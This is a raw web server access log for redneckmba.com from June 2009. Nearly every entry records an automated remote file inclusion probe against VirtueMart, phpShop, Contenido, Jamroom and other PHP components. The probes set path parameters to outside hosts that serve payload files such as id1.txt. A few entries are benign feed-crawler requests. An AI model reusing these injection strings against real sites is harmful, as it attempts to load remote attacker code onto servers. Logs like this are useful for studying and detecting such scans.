122.153.28.140 - - [28/Jun/2009:23:44:29 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:44:30 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:44:30 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:44:30 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:44:30 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /logs/access.log//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /logs/access.log//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [28/Jun/2009:23:48:12 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [28/Jun/2009:23:48:13 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [28/Jun/2009:23:48:18 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:50:57 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:53:07 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:54:44 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:54:44 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:54:44 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:55:46 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:55:46 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:55:46 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
80.93.48.103 - - [28/Jun/2009:23:58:33 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [28/Jun/2009:23:58:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:59:27 -0700] "GET /logs//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:59:30 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [28/Jun/2009:23:59:32 -0700] "GET /administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:45 -0700] "GET /administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:45 -0700] "GET /administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:45 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:45 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:45 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:00:46 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:02:21 -0700] "GET /administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:02:21 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:02:21 -0700] "GET /logs//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:04:08 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:04:17 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/Log/file.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:24 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:24 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:24 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:25 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:25 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:04:25 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:45 -0700] "GET /logs/access.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:45 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:45 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:54 -0700] "GET /logs/access.log///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:54 -0700] "GET /logs///components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:04:54 -0700] "GET //components/com_virtuemart/themes/default/templates/product_details/flypage.tpl.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:05:49 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.0.139.129 - - [29/Jun/2009:00:05:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop_browse_queries.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:08:22 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:08:30 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:24 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:26 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:26 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:29 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:10:29 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:39 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:39 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:40 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:43 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:43 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [29/Jun/2009:00:10:43 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:11:47 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:11:47 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:11:47 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:11:59 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:00:11:59 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:13:14 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:13:14 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:13:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:13:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:00:14:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php.?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.2.21 - - [29/Jun/2009:00:15:07 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
94.23.2.21 - - [29/Jun/2009:00:15:08 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
94.23.2.21 - - [29/Jun/2009:00:15:08 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
76.13.123.194 - - [29/Jun/2009:00:15:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:00:21:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
110.45.144.34 - - [29/Jun/2009:00:22:03 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.34 - - [29/Jun/2009:00:22:03 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.34 - - [29/Jun/2009:00:22:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.207 - - [29/Jun/2009:00:23:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
110.45.144.33 - - [29/Jun/2009:00:23:49 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:00:23:50 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:00:23:50 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.106 - - [29/Jun/2009:00:41:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:00:57:16 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:00:57:17 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:00:57:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
209.68.2.99 - - [29/Jun/2009:00:57:44 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
209.68.2.99 - - [29/Jun/2009:00:57:44 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.redneckmba.com"
209.68.2.99 - - [29/Jun/2009:00:57:44 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2090 "-" "libwww-perl/5.805" "www.redneckmba.com"
110.45.144.34 - - [29/Jun/2009:00:58:20 -0700] "GET /logs/access_090112.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
209.68.2.99 - - [29/Jun/2009:01:00:28 -0700] "GET /logs/access_090112.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
110.45.144.33 - - [29/Jun/2009:01:01:06 -0700] "GET /logs/access_090112.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:01:20 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:01:20 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:01:20 -0700] "GET /logs/access_090112.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:01:01:32 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
